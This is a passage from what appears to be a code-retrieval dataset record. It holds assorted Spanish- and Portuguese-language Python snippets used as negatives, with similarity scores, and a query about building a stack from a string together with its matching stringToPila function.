self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux+i+1,aux2+i+1],\"abajo-derecha\",2)\n\t\t\t\t\t\t\t\tkey[6]=True\n\t\t\t#arriba-derecha\n\t\t\taux = fila+1\n\t\t\taux2 = columna-1\n\t\t\tif aux<5 and aux>0 and aux2<5 and aux2>0:\n\t\t\t\tpar = [5-aux,aux2]\n\t\t\t\tif color==1:\n\t\t\t\t\trango = min(par)\n\t\t\t\t\tif self.tablero[aux][aux2]==2:\n\t\t\t\t\t\tfor i in range(rango):\n\t\t\t\t\t\t\tif self.tablero[aux+i+1][aux2-i-1]==1:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux+i+1,aux2-i-1],\"abajo-izquierd\",1)\n\t\t\t\t\t\t\t\tkey[7]=True\n\t\t\t\tif color==2:\n\t\t\t\t\trango = min(par)\n\t\t\t\t\tif self.tablero[aux][aux2]==1:\n\t\t\t\t\t\tfor i in range(rango):\n\t\t\t\t\t\t\tif self.tablero[aux+i+1][aux2-i-1]==2:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux+i+1,aux2-i-1],\"abajo-izquierda\",2)\n\t\t\t\t\t\t\t\tkey[7]=True\n\t\t\t\n\t\t\tif True in key:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\telse:\n\t\t\treturn False", "def oracle(c):\n correct_arcs = get_arcs(c.sentence)\n if can_left_arc(c, correct_arcs):\n return Transition('la', c.sentence[c.stack[-1]].deprel)\n elif can_right_arc(c, correct_arcs):\n return Transition('ra', c.sentence[c.buffer[0]].deprel)\n else:\n return Transition('sh', '_')", "def prueba_clase():\n\n pos_ini = (0, 1, 0, 1, 0,\n 0, 0, 1, 1, 0,\n 0, 0, 0, 1, 1,\n 0, 0, 1, 1, 1,\n 0, 0, 0, 1, 1)\n\n pos_a0 = (1, 0, 0, 1, 0,\n 1, 0, 1, 1, 0,\n 0, 0, 0, 1, 1,\n 0, 0, 1, 1, 1,\n 0, 0, 0, 1, 1)\n\n pos_a4 = (1, 0, 0, 0, 1,\n 1, 0, 1, 1, 1,\n 0, 0, 0, 1, 1,\n 0, 0, 1, 1, 1,\n 0, 0, 0, 1, 1)\n\n pos_a24 = (1, 0, 0, 0, 1,\n 1, 0, 1, 1, 1,\n 0, 0, 0, 1, 1,\n 0, 0, 1, 1, 0,\n 0, 0, 0, 0, 0)\n\n pos_a15 = (1, 0, 0, 0, 1,\n 1, 0, 1, 1, 1,\n 1, 0, 0, 1, 1,\n 1, 1, 1, 1, 0,\n 1, 0, 0, 0, 0)\n\n pos_a12 = (1, 0, 0, 0, 1,\n 1, 0, 0, 1, 1,\n 1, 1, 1, 0, 1,\n 1, 1, 0, 1, 0,\n 1, 0, 0, 0, 0)\n\n\n entorno = Lights_out(pos_ini)\n\n assert entorno.acciones_legales(pos_ini) == range(25)\n assert entorno.sucesor(pos_ini, 0) == pos_a0\n assert entorno.sucesor(pos_a0, 4) == pos_a4\n assert entorno.sucesor(pos_a4, 24) == pos_a24\n assert entorno.sucesor(pos_a24, 15) == pos_a15\n assert entorno.sucesor(pos_a15, 12) == pos_a12\n print \"Paso la prueba de la clase\"", "def adelanta_camion(self, entorno, operacion, medio_de_origen_o_destino, camion, tipo):\r\n # TODO mejorar implementacion\r\n\r\n if tipo == \"Operacion\":\r\n\r\n 
operacion.recurso.cola.remove(camion)\r\n operacion.recurso.cola = \\\r\n operacion.recurso.cola[0:operacion.recurso.cola.index(self)] \\\r\n + [camion] + operacion.recurso.cola[operacion.recurso.cola.index(self):]\r\n\r\n print str(camion) + \" adelantado bajo criterio de \" + str(self) + \" \" + str(entorno.now)\r\n print \"\\tEn sistema: \" + str(operacion.recurso.cola) + \" Hora: \" + str(entorno.now)\r\n\r\n elif tipo == \"Almacen\":\r\n\r\n medio_de_origen_o_destino.cola.remove(camion)\r\n medio_de_origen_o_destino.cola = \\\r\n medio_de_origen_o_destino.cola[0:medio_de_origen_o_destino.cola.index(self)] \\\r\n + [camion] + medio_de_origen_o_destino.cola[medio_de_origen_o_destino.cola.index(self):]\r\n\r\n print str(camion) + \" adelantado bajo criterio de \" + str(self) + \" \" + str(entorno.now)\r\n print \"\\t\" + medio_de_origen_o_destino.nombre + \":\" \\\r\n + str(medio_de_origen_o_destino.cola) + \" Hora: \" + str(entorno.now)", "def __init__(self, altura, peso, edad):\n\t\tself.altura = altura # OJO TODAS LAS VARIABLES SON PUBLICAS \n\t\tself.peso = peso \n\t\tself.edad = edad\n\t\tself.profesion = \"\" # esta la inicializamos nosotros\n\t\tself.lista_tareas = []\n\t\tself.__privado = 1 # este atributo es privado no podemos acceder a el desde fuera", "def fim_da_rodada(self, recompensa, m, numero_de_cacadores):\n #print('Jogador 4 {}'.format(self.historico[-1]))\n pass", "def __init__(self):\n self.modelo = [\"A\", \"sucio\", \"sucio\",\"sucio\", \"sucio\",\"sucio\", \"sucio\"]", "def tecla(botao, player):\n botao_map = {'acelerador': [K_UP, K_w], 'freio': [K_DOWN, K_s],\\\n 'esquerda': [K_LEFT, K_a], 'direita': [K_RIGHT, K_d],\\\n 'atira': [K_RCTRL, K_LCTRL]}\n if player == 1:\n return botao_map[botao][0]\n return botao_map[botao][1]", "def aa(seq):\n global codontable\n seq = seq.upper()\n if codontable is None:\n # TODO: figure out the right place for the pre-computed information here\n bases = ['T', 'C', 'A', 'G']\n codons = [a+b+c for a in bases for b in bases for c in bases]\n codons = codons + list(map(lambda x: x.lower(), codons))\n amino_acids = 'FFLLSSSSYY**CC*WLLLLPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG'\n amino_acids = amino_acids + amino_acids.lower()\n codontable = dict(zip(codons, amino_acids))\n res = ''\n for i in range(0, len(seq) - 2, 3):\n res += codontable[seq[i:(i+3)]]\n return res", "def crear_tablero(tablero):\n for x in range(numero_filas):\n completar_tablero = [\"O\"] * numero_columnas\n tablero.append(completar_tablero) \n return tablero", "def crear_arbol():\n print (\"En este programa te brindamos 2 opciones para crear arboles, elige la que mas se adapte a tu objetivo\")\n \n try:\n crear=int(input(\"1. Crear un arbol de manera aleatoria\\n2. Introducir los datos en forma de arreglo\\n\"))\n except:\n print(\"Valor Invalido\")\n \n if crear==1:\n print(\"\\nExcelente! Tu arbol sera generado de forma aleatoria. Solo necesitamos aclarar que tipo de arbol quieres\")\n while True:\n try:\n altura=int(input(\"\\nAñade la altura de tu arbol: \"))\n except:\n print(\"El valor introducido no es valido!\")\n else:\n break\n \n perfecto=input(\"\\n¿Deseas crear un arbol perfecto? (si/no): \")\n if perfecto.lower()!=\"no\":\n perfecto=True\n else:\n perfecto=False\n \n arbol=tree(height=altura, is_perfect=perfecto)\n return arbol\n \n elif crear==2:\n print(\"\\nExcelente! Tu arbol sera generado en base a un arreglo. Solo necesitamos recibir los valores\")\n valores=[]\n counter=0\n print(\"\\nIntroduce los valores en orden. 
El valor inicial sera considerado la raiz. Los valores se ordenaran de izquiera a derecha.\" +\n \"Deja el valor en blanco para saltar ese espacio. Escribe -1 para dejar de añadir valores\")\n valor=\" \"\n while valor!=\"-1\":\n valor=input(f\"Introduzca el valor {counter}: \")\n if valor==\"\":\n valor=None\n valores.append(valor)\n counter+=1\n else:\n valores.append(int(valor))\n counter+=1\n valores.pop()\n root=build(valores)\n return root", "def limpiarVentana(self):\n\n self.productosAgregados=0\n self.lotesVentas={}\n self.facturaCobrada=False\n self.obraSocialSeleccionada=None\n self.formapago = None\n self.factura = None\n self.data = {}\n self.detallesTabla = {}\n self.lineObra.clear()\n self.lineObra.setEnabled(True)\n self.lineCuit.clear()\n self.lineCuit.setEnabled(True)\n self.tableObra.setVisible(False)\n self.rbtnObra.setChecked(False)\n self.limpiarTabla(self.tableProductos)\n self.limpiarTabla(self.tableFactura)\n self.cargarProductosSinObra()", "def arredonda(elemento):\n chave, mm = elemento\n return (chave,round(mm,1))", "def get_add_on():\n #List of all the add ons made with a list comprehension\n add_on_list = [[a, b] for a in list(string.ascii_lowercase) for b in list(string.ascii_lowercase)]\n global a_base\n #reset the a_base if it gets to high\n if a_base + a_key > len(add_on_list) - 1:\n a_base = -1\n #sets value of add_on\n add_on = add_on_list[a_base + a_key]\n add_on = \"\".join(add_on)\n a_base += a_key\n return add_on", "def cria_carro_fiat(self):\n\n self.total_de_carros_fiat += 1\n print(\"Carro Fiat #\", self.total_de_carros_fiat, \" criado\")", "def CreadorComentario(hora, fecha, contenido, act, usuario): \n nuevoComentario = Comentario(horacomentario=hora, fechacomentario=fecha, contenido=contenido, idactcomentario=act,loginusuario=usuario)\n nuevoComentario.save()\n Accion.objects.crearAccion(\n usuario,\n \"El usuario %s hizo un comentario en la actividad %s\" % (usuario.username, act.nombreact),\n 'i')\n\n Accion.objects.crearAccion(\n usuario,\n \"Se creo una instancia de Comentario con los valores Fecha: %s, Contenido: %s\" % (fecha, contenido),\n 'd'\n )", "def __init__(self, lista_enlazada): \n\t\tself.lista = lista_enlazada\n\t\tself.anterior = None\n\t\tself.actual = lista_enlazada.prim\n\t\tself.pila_anteriores = Pila()\n\t\tself.posicion = 0", "def cargar_atril(self,lista,bolsa):\n self.atril = lista\n self.bolsa = bolsa", "def addCadastro(self, id_conteudo, cpf=None, rg=None, data_nascimento=None, nome=None,\n endereco=None, complemento=None, bairro=None, cep=None, email=None,\n profissao=None, faculdade=None, curso=None, facebook=None, twitter=None, fone1=None, fone2=None,\n fone3=None, anexo=None, frase=None, \n opt_parceiro=None, opt_opovo=None):\n try:\n conteudo = self._getConteudoPublicado(id_conteudo=id_conteudo)\n for i in conteudo['campos']:\n if (i['nome'] != 'complemento' and i['nome'] != 'fone2' and i['nome'] != 'fone3' and i['nome'] != 'opt_parceiro' and i['nome'] != 'opt_opovo' and i['nome'] != 'facebook' and i['nome'] != 'twitter'):\n if not eval(i['nome']):\n #algum campo não for preenchido\n return 3\n \n if(conteudo['cadastro_unico']):\n count_cpf = self.execSql(\"select_cpf_cadastros\",\n id_conteudo=int(id_conteudo),\n cpf=cpf).next()['count']\n if(count_cpf):\n #cpf já cadastrado\n return 2\n id_cadastro = self.execSql(\"select_nextval_cadastro\").next()[\"id\"]\n\n sequencial = self.execSql(\"select_maxval_sequencial_conteudo_cadastros\",\n id_conteudo=int(id_conteudo)).next()['max']\n if(sequencial):\n sequencial = 
int(sequencial)+1\n else:\n sequencial = 1\n self.execSqlu(\"insert_cadastro\",\n id_cadastro=int(id_cadastro),\n id_conteudo=int(id_conteudo),\n sequencial=int(sequencial),\n cpf=cpf,\n rg=rg,\n data_nascimento=data_nascimento,\n nome=nome,\n endereco=endereco,\n complemento=complemento,\n bairro=bairro,\n cep=cep,\n email=email,\n profissao=profissao,\n faculdade=faculdade,\n curso=curso,\n facebook=facebook,\n twitter=twitter,\n fone1=fone1,\n fone2=fone2,\n fone3=fone3,\n anexo=anexo,\n frase=frase,\n opt_parceiro=opt_parceiro,\n opt_opovo=opt_opovo)\n return 0\n except:\n #erro tente novamente\n return 1", "def posicioAlParking(matricula):\n if(_formatMatriculaValid(matricula)):\n con = lite.connect('parking.db')\n cur = con.cursor()\n try:\n cur.execute(\"SELECT placa FROM parking WHERE id_cotxe=?;\",(matricula,))\n row = cur.fetchone()\n if row:\n print \"El cotxe amb matricula\",matricula,\" es troba a la plaça\", row[0]\n else:\n print \"El coche amb matricula\",matricula,\"no es troba al parking\"\n\n except:\n pass\n con.close()\n else:\n print(\"Format matricula invalid per buscar la seva posicio.\")", "def adivinha(estado):\n letra = raw_input('Escolha uma letra: ')\n # verifica letra - ciclo\n while letra in estado['usadas']:\n print\n print '*** Letra já usada. Escolha outra sff!***'\n print\n letra = raw_input('Escolha uma letra: ')\n return letra" ]
[ "0.6110482", "0.58829135", "0.58471066", "0.5808168", "0.5769837", "0.5732787", "0.571716", "0.56439555", "0.5630807", "0.5551206", "0.55446774", "0.55200577", "0.5448135", "0.5437733", "0.5413697", "0.539102", "0.5377001", "0.5376293", "0.53636044", "0.53557664", "0.53530836", "0.5314257", "0.530811", "0.53033286", "0.52935094", "0.52654743", "0.526159", "0.52381605", "0.523792", "0.5222164", "0.52144593", "0.5214231", "0.52088976", "0.52026623", "0.5195885", "0.51841223", "0.518329", "0.51818466", "0.51686764", "0.51676464", "0.51492316", "0.5146041", "0.51458824", "0.51194465", "0.5116166", "0.5109906", "0.51081556", "0.51078004", "0.51053864", "0.50908583", "0.5086292", "0.5078589", "0.50719184", "0.5060955", "0.50602454", "0.5050151", "0.50495875", "0.50387657", "0.5025809", "0.50101453", "0.5008386", "0.5005887", "0.5003441", "0.4992609", "0.49904948", "0.49902463", "0.4960732", "0.4950297", "0.49445114", "0.49423566", "0.4941613", "0.49373937", "0.49337748", "0.49284247", "0.4917653", "0.4916684", "0.49123418", "0.4910442", "0.4907065", "0.49039826", "0.49037698", "0.4900909", "0.48996365", "0.48976508", "0.48954594", "0.48942074", "0.4883983", "0.48839816", "0.4879238", "0.4878766", "0.48784485", "0.48758483", "0.48753214", "0.4871771", "0.48624742", "0.48588637", "0.48553258", "0.48529825", "0.4851269", "0.48504436", "0.48495147" ]
0.0
-1
Devuelve pila del string ingresado
def stringToPila(palabra):
    pila = Pila()
    for elemento in palabra:
        apilar(pila, elemento)
    return pila
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_string2(self):\n pass", "def getApellidos(apellido):\n texto = f'El apellido es: {apellido}'\n return texto\n pass", "def psea(pname): # -> str:\n ...", "def print_as_text(pi):\n\n pi_string = str(\"%1.18f\" % pi)\n\n print(\"Definitive: \" + PI_STRING)\n\n print(\"Estimated: \", end=\"\")\n\n for i in range(0, len(pi_string)):\n\n if pi_string[i] == PI_STRING[i]:\n\n print(GREEN + pi_string[i] + RESET, end=\"\")\n\n else:\n\n print(RED + pi_string[i] + RESET, end=\"\")\n\n print(\"\\n\")", "def EnglishToPig(str):\r\n\r\n # TODO: Your code here\r\n\r\n\r\n # Change the return to return the converted string\r\n return(\"\")", "def __str__(self):\n return \"p(\" + \",\".join([str(round(c, digits)) for c in self.components]) + \")\"", "def input_cislo_policka():\n str_policka = input('\\nNa ktore policko chces umiestnit svoje \\'X\\'? Zadaj hodnotu 0 - 19: ')\n return str_policka", "def __repr__(self):\n s = ''\n no = self.getRaiz()\n s += str(no.getPai()) + '\\n'\n s += '^' + '\\n'\n s += str(no.getEsquerdo()) + ' <- '\n s += str(no.getDado()) + ' -> '\n s += str(no.getDireito())\n return s", "def text(self) -> str:", "def __unicode__(self):\n d = ((2, \".\"), (6, \".\"), (10, \"/\"), (15, \"-\"))\n s = list(map(str, self.cnpj))\n \n for i, v in d:\n s.insert(i, v)\n \n r = ''.join(s)\n \n return r", "def __str__(self):\n\t\tif self.__valide:\n\t\t\treturn str(self.__tete)\n\t\telse:\n\t\t\treturn \"(polynome invalide)\"", "def stringReco(obj):\n name = obj.get_name()\n name = obj._pid if (name is None) else name\n return (\"pdg: \" + name + \" E: \" + str(obj._E)\n + \" px: \" + str(obj._px) + \" py: \" + str(obj._py)\n + \" pz: \"+ str(obj._pz) + \" mass: \" + str(obj._m))", "def refang(self, text: str):", "def get_pi_as_string():\n\n request = requests.get(\"http://www.eveandersson.com/pi/digits/10000\")\n doc = BeautifulSoup(request.text, \"html.parser\").select_one(\"pre\").text.strip()\n pi_string = doc.replace(\" \", \"\").replace(\".\", \"\").replace(\"\\n\", \"\")\n return pi_string", "def __str__(self) -> str:\r\n return self.process(self.string)", "def value(self, p_str, p_str_1=None): # real signature unknown; restored from __doc__ with multiple overloads\n return \"\"", "def us(self, string=''):\n return string.replace(' ', '_')", "def to_pinyin(s: str) -> str:\n if s == '山西':\n return 'Shan1xi'\n elif s == '陕西':\n return 'Shan3xi'\n pylist = lazy_pinyin(s)\n py = ''.join(pylist)\n return py", "def get_orion_space_string(self) -> str:", "def saluda2(sujeto):\n print 'Hola %s !!' 
% sujeto", "def gerarPalavraSecreta():\n global palavraOculta\n for _ in range(len(palavraDoJogo)):\n palavraOculta += '*'\n print(palavraOculta)", "def __str__(self):\n allowed = ['!', '@', '#', '$', '%', '^', '&', '*', '/', '.', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n returnstring = \"\"\n for row in self.positions:\n for char in row:\n if char.isupper() or char == 'r' or char in allowed:\n returnstring += \"| \" + char + \" \"\n else:\n returnstring += \"| \" + \"_\" + \" \"\n returnstring += \"\\n\"\n return returnstring", "def label(mi_, ma_):\n\treturn \"caractères Unicode des points de code {} à {}\".format(mi_, ma_)", "def make_spondaic(self, scansion: str) -> str:\n mark_list = string_utils.mark_list(scansion)\n vals = list(scansion.replace(\" \", \"\"))\n new_vals = self.SPONDAIC_PENTAMETER[:-1] + vals[-1]\n corrected = \"\".join(new_vals)\n new_line = list(\" \" * len(scansion))\n for idx, car in enumerate(corrected):\n new_line[mark_list[idx]] = car\n return \"\".join(new_line)", "def __str__(self):\n turnstile = \"⊢\" if settings.unicode else \"|-\"\n if self.hyps:\n str_hyps = \", \".join(str(hyp) for hyp in self.hyps)\n return str_hyps + ' ' + turnstile + ' ' + str(self.prop)\n else:\n return turnstile + ' ' + str(self.prop)", "def __str__(self):\n value = str(self.puzzle) + str(\" \") + str(self.g) + str(\" \") + str(self.h)\n return value", "def GenerateString(self, i, string):\r\n \r\n if i <= 0:\r\n return string\r\n\t\t\r\n string = string.replace(\"F\", (self.f).lower()) \r\n string = string.replace(\"X\", (self.x).lower())\r\n string = string.replace(\"Y\", (self.y).lower())\r\n \r\n \r\n string = string.upper()\r\n string = self.GenerateString(i - 1, string)\r\n\r\n return string", "def strand_string(self):\n if self.is_forward():\n return '+'\n if self.is_reverse():\n return '-'\n return '.'", "def __str__(self):\n return '{} {}'.format(self.nombre, self.apellido)", "def cliquer_sur_unité(self):", "def metaphlan_krona_string(input):\n s = []\n for f in input:\n name = bn(f).replace(\"_pe.krona\", \"\").replace(\"_se.krona\", \"\")\n s.append(f\"{f},{name}\")\n return \" \".join(s)", "def string(self):\n return f'y = {self.a.item()}'", "def __str__(self):\n bold = \"*\" if self.bold else ''\n italic = \"/\" if self.italic else ''\n underline = \"_\" if self.underline else ''\n return bold + italic + underline + self.character", "def getNombre(nombre):\n texto = f'El usuario es: {nombre}'\n return texto\n pass", "def toString():", "def string(self):\n text = \"\"\n for char, qty in self.chars.items():\n text += char * qty\n return \"\".join(sorted(text))", "def string(self,pos_0,pos_1,n):\r\n n=int(n)\r\n if pos_0 <10:\r\n pos_0=\"00\"+str(pos_0)\r\n elif pos_0<100:\r\n pos_0=\"0\"+str(pos_0)\r\n\r\n if n <10:\r\n n=\"0\"+str((n))\r\n \r\n\r\n\r\n if pos_1 <10:\r\n pos_1=\"00\"+str(pos_1)\r\n elif pos_1<100:\r\n pos_1=\"0\"+str(pos_1)\r\n\r\n\r\n\r\n\r\n #pos\r\n c=\"\"\r\n\r\n c=str(pos_0)+str(pos_1)+str(n)\r\n #print(\"c\",c)\r\n return c", "def __str__(self):\n s = \"\"\n for i in range(13,25):\n if (self.p1vec[i] > 0):\n s += \"|W{0:02}|\".format(self.p1vec[i])\n elif (self.p2vec[25 - i] > 0):\n s += \"|B{0:02}|\".format(self.p2vec[25 - i])\n else:\n s += \"| |\"\n s += '\\n'\n for i in range(12, 0,-1):\n if (self.p1vec[i] > 0):\n s += \"|W{0:02}|\".format(self.p1vec[i])\n elif (self.p2vec[25 - i] > 0):\n s += \"|B{0:02}|\".format(self.p2vec[25 - i])\n else:\n s += \"| |\"\n return s", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def 
preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def filtra(rut):\n caracteres = \"1234567890k\"\n rutx = \"\"\n for cambio in rut.lower():\n if cambio in caracteres:\n rutx += cambio\n return rutx", "def __unicode__(self):\n\n d = ((3, \".\"), (7, \".\"), (11, \"-\"))\n s = list(map(str, self.cpf))\n\n for i, v in d:\n s.insert(i, v)\n\n r = ''.join(s)\n\n return r", "def Problem11():\n return 'Ductile Coulomb-Mohr'", "def exemple():\r\n\r\n case_1 = \"\\u25CC\"\r\n case_1 = u\"{}\".format(case_1)\r\n fourmi_1_1 = \"\\u22C0\"\r\n fourmi_1_1 = u\"{}\".format(fourmi_1_1)\r\n fourmi_2_1 = \"\\u21CA\"\r\n fourmi_2_1 = u\"{}\".format(fourmi_2_1)\r\n fourmi_3_1 = \"\\u25BC\"\r\n fourmi_3_1 = u\"{}\".format(fourmi_3_1)\r\n fourmi_1_2 = \"\\u22C0\"\r\n fourmi_1_2 = u\"{}\".format(fourmi_1_2)\r\n fourmi_2_2 = \"\\u21C8\"\r\n fourmi_2_2 = u\"{}\".format(fourmi_2_2)\r\n fourmi_3_2 = \"\\u25B2\"\r\n fourmi_3_2 = u\"{}\".format(fourmi_3_2)\r\n clods_1 = \"\\u2726\"\r\n clods_1 = u\"{}\".format(clods_1)\r\n clods_2 = \"\\u2737\"\r\n clods_2 = u\"{}\".format(clods_2)\r\n clods_3 = \"\\u2739\"\r\n clods_3 = u\"{}\".format(clods_3)\r\n \r\n print(term.move_xy(82,3) + term.white + 'DEPOT : ' + (case_1))\r\n print(term.move_xy(82,5) + term.white + 'Clods de niveau 1 : ' + (clods_1))\r\n print(term.move_xy(82,6) + term.white + 'Clods de niveau 2 : ' + (clods_2))\r\n print(term.move_xy(82,7) + term.white + 'Clods de niveau 3 : ' + (clods_3))\r\n print(term.move_xy(82,8) + term.white + 'Fourmis de niveau 1 : ' + (fourmi_1_1) + ' ' + (fourmi_1_2))\r\n print(term.move_xy(82,9) + term.white + 'Fourmis de niveau 2 : ' + (fourmi_2_1) + ' ' + (fourmi_2_2))\r\n print(term.move_xy(82,10) + term.white + 'Fourmis de niveau 3 : ' + (fourmi_3_1) + ' ' + (fourmi_3_2))\r\n print(term.move_xy(82,12) + term.white + 'Joueur 1 vous jouez en rouge.')\r\n print(term.move_xy(82,13) + term.white + 'Joueur 2 vous jouez en jaune.')", "def format(self) -> str:", "def drawString(text: str):\n pass", "def PigToEnglish(str):\r\n\r\n # TODO: Your code here\r\n\r\n\r\n # Change the return to return the converted string\r\n return(\"\")", "def __str__(self):\n inside_list = lambda _v, _h, a: any(x == _h and y == _v for y, x in a)\n resultant = ''\n for _v in range(1, self.size_v + 1):\n for _h in range(1, self.size_h + 1):\n if self.current_location[1] == _h and self.current_location[0] == _v:\n resultant = resultant + '@'\n elif inside_list(_v, _h, self.boxes):\n resultant = resultant + '$'\n elif inside_list(_v, _h, self.storage_locations):\n resultant = resultant + '.'\n elif inside_list(_v, _h, self.wall_squares):\n resultant = resultant + '#'\n else:\n resultant = resultant + ' '\n resultant = resultant + '\\n'\n\n return resultant", "def string_value ( self, font ):\n return self.factory.str_font( font )", "def string_value ( self, font ):\n return self.factory.str_font( font )", "def string_value ( self, font ):\n return self.factory.str_font( font )", "def string_value ( self, font ):\n return self.factory.str_font( font )", "def one_pass(self, s: str) -> str:\n alpha_map = {\n '1': 'a', '2': 'b', '3': 'c', '4': 'd', '5': 'e', '6': 'f', '7': 'g',\n '8': 'h', '9': 'i', '10': 'j', '11': 'k', '12': 'l', '13': 'm', '14': 'n',\n '15': 'o', '16': 'p', '17': 'q', '18': 'r', '19': 's', '20': 't',\n '21': 'u',\n '22': 'v', '23': 'w', '24': 'x', '25': 'y', '26': 'z'\n }\n\n i, res = 0, ''\n while i < len(s):\n if i + 2 < len(s) and s[i + 2] == '#':\n res += alpha_map[s[i:i + 2]]\n i += 3\n else:\n res += 
alpha_map[s[i]]\n i += 1\n return res", "def _trans_string(self, n):\r\n return \"%s %d\" % (self.desc, n+1)", "def _pinyin(self, rest):\n # Fix if sentence contains some english '.tr yacin太牛了'\n rest = filter(lambda x: not self.isascii(x), rest.decode('utf8'))\n def reduce_reading((char, readings)):\n \"\"\"If a character has multiple cjklib readings, use the fine-tuning\n dict from pinyin toolkit and CEDICT as a backup.\"\"\"\n if len(readings) == 1:\n return readings[0]\n else:\n try:\n return self.pinyin_toolkit_lookup[char]\n except KeyError:\n return self._dict_reading_lookup(char)\n\n readings = [self.char_lookup.getReadingForCharacter(x, 'Pinyin') for x in rest]\n res = u' '.join(map(reduce_reading, zip(rest, readings)))\n return res.encode('utf8')", "def get_string(self, **kwargs):\n ...", "def getText():", "def getText():", "def getText():", "def getText():", "def getText():", "def autoid(self) -> str:", "def autoid(self) -> str:", "def __str__(self):\n result = ''\n result += '+---+\\n'\n for i in range(3):\n result += '|' + self[i*3] + self[i*3+1] + self[i*3+2] + '|\\n'\n result += '+---+'\n return result", "def str_value(self, data):\n return str(180*SimpleField.value(self, data)/pi)", "def lowerPen(gcode):\r\n gcode.append(\"M300 S43\")\r\n #gcode.append(\"G0 Z0\")\r", "def _str_make(self):\n return self._name if self._fact is None else f\"{self._fact} × {self._name}\"", "def pos_to_name(reg):\n l,b = position_region(reg).galactic() \n if numpy.sign(b) == 1:\n pm = \"+\"\n else:\n pm = \"-\"\n text = \"G%4.2f%1s%4.2f\" % (l,pm,abs(b))\n return text", "def llegir_placa(p):\n\t# Obrim el fitxer\n\ts = \"\"\n\tf=open('places.dat','r+')\n\t# Calculem la posicio que volem mirar\n\tposicio = p*7\n\tf.seek(posicio)\n\ts+=f.read(7)\n\tf.close()\n\treturn s", "def __init__(self, string, spongeness=6):\n self.original = string\n self.spongeness = spongeness\n self.sponge_percentage = int(spongeness) * 10\n self.text = self.__spongefy()", "def _get_string_cfdi(text, size=100):\n if not text:\n return None\n text = text.replace('|', ' ').replace('/', '').replace('-', '').replace('_', '')\n return text.strip()[:size]", "def __str__(self):\n return \"s(\" + str(self.p1) + \",\" + str(self.p2) + \")\"", "def rep_Ir(glosstext, repchar=\"…\"):\n oplat = \"[GLat]\"\n clat = \"[/GLat]\"\n latlist = []\n if glosstext.find(oplat) != 0:\n latlist.append(\"\")\n glosstext = glosstext[glosstext.find(oplat):]\n while oplat in glosstext:\n lat = glosstext[:glosstext.find(clat) + 7]\n latlist.append(lat)\n glosstext = glosstext[glosstext.find(clat) + 7:]\n if oplat in glosstext:\n glosstext = glosstext[glosstext.find(oplat):]\n else:\n if glosstext:\n latlist.append(\"\")\n repchar = \" \" + repchar + \" \"\n latintext = repchar.join(latlist)\n latintext = latintext.strip()\n return latintext", "def nom_complet(self):\n return \"{:25} (probabilité={}, {})\".format(\n self.nom, self.probabilite_sur, self.msg_points)", "def __str__(self):\n out = \"{}.\".format(self.move_number)\n if self.white.san != \"\":\n out += \" \" + str(self.white)\n else:\n out += \"..\"\n if self.black.san != \"\":\n out += \" \" + str(self.black)\n if self.comment:\n out += \" {\" + self.comment + \"}\"\n return out", "def get_str ( self, fillchar='-', rwx_chars=\"rwx\" ):\n return (\n ( rwx_chars[0] if self.readable else fillchar ) +\n ( rwx_chars[1] if self.writable else fillchar ) +\n ( rwx_chars[2] if self.executable else fillchar )\n )", "def _preprocess(self, sent: str) -> str:\n sent = sent.replace(\" \", \"▁\")\n 
return \" \".join([c for c in sent])", "def text(self, str: str, x: int, y: int, colour: int, /) -> None:", "def generate_strings(self, new_puzzle):\n return new_puzzle._start", "def __str__(self):\n local_s = 'F30A: '\n local_s += '\\n'\n return local_s", "def Scheme(self) -> str:", "def test_str_method(self):\n s1 = Square(4, 6, 2, 12)\n self.assertEqual(s1.__str__(), '[Square] (12) 6/2 - 4')", "def __str__(self):\n width = self.width\n if self.length == 0:\n percent = 1\n else:\n percent = max(self.value, 0) / self.length\n pg_char = self.pg_char\n ending = ' ' + (self.str_time_remaining()\n if self.timer else '{0} of {1} complete'.format(\n self.value, self.length))\n if width - len(ending) < 10 or self.has_output:\n self.width = 0\n if self.timer:\n return \"{0:.0%} complete: {1}\".format(\n percent, self.str_time_remaining())\n return \"{0:.0%} complete\".format(percent)\n num_of_chars = int(percent * self.width)\n pbar = '[' + pg_char*num_of_chars + \\\n ' '*(self.width-num_of_chars) + ']' + ending\n\n str_percent = ' {0:.0%} '.format(percent)\n\n return pbar[:self.width//2 - 2] \\\n + str_percent + pbar[self.width//2+len(str_percent) - 2:]", "def __str__(self):\n return str(\"{0} {1} {2} {3}\".format(self.label, self.position[0], self.position[1], self.position[2]))", "def to_string(self):\n return _parrot_str_to_str(self.val)", "def _get_papy_sentence(self):\n sentences = [\n \"un crayon basique peut écrire jusqu’à 45 000 mots. \",\n \"la troisième langue officielle de la \"\n \"Nouvelle-Zélande est le langage des signes.\",\n \"si la Terre faisait la taille d’un grain de sable, \"\n \"le Soleil ferait la taille d’une orange.\",\n \"à la base, le papier bulle a été inventé \"\n \"pour servir de papier peint.\",\n ]\n chosen_sentence = random.choice(sentences)\n response = \"J'ai une histoire à te raconter : \" + chosen_sentence\n return response", "def _(string):\n\t\treturn string", "def area(lado):\n\treturn \"El area de un cuadrado es \"+ str(lado*lado)", "def test_str(self):\n self.assertEqual(str(self.meter), \"1 * m\")\n\n newton = self.kgram * self.meter / (self.second ** 2)\n\n self.assertEqual(str(newton), \"1.0 * kg * m * s^-2\")", "def cargaAutoStr(pila):\n while not pila_llena(pila):\n largo = random.randint(1, 15)\n apilar(pila, randString(largo))", "def pstring( s ) :\r\n\r\n if s is None : \r\n return None \r\n\r\n # else ... \r\n\r\n fmt = '%dp' % ( len(s) + 1 ) \r\n\r\n ps = struct.pack(fmt, s) \r\n\r\n # # debug \r\n # print \"pstring('%s', '%s') : '%s'\" % (fmt, s, ps)\r\n\r\n return ps", "def simple_str(self):\n pass", "def unit(self) -> str:", "def prescription(self):\n prescription = 